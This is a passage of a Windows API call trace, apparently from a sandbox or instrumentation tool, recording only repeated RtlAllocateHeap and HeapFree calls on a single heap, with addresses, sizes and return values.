RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103888 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf10b8 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103778 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106a80 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b90 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xee568 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0035.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0035.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0035.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0035.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106390 [0035.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109028 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0035.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x109258 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b00 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0035.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0035.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0035.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105290 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103c08 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105290 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105fa0 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103c08 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.739] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0035.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b00 | out: hHeap=0xe0000) returned 1 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a90 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105cd0 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1058e0 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1064b0 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105d60 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1061e0 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106300 [0035.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105fa0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1065d0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105bb0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105e80 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105730 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a00 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1060c0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105c40 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106150 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1089a0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1086d0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107f80 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1081c0 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108250 [0035.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108130 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0035.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0035.746] HeapFree (in: 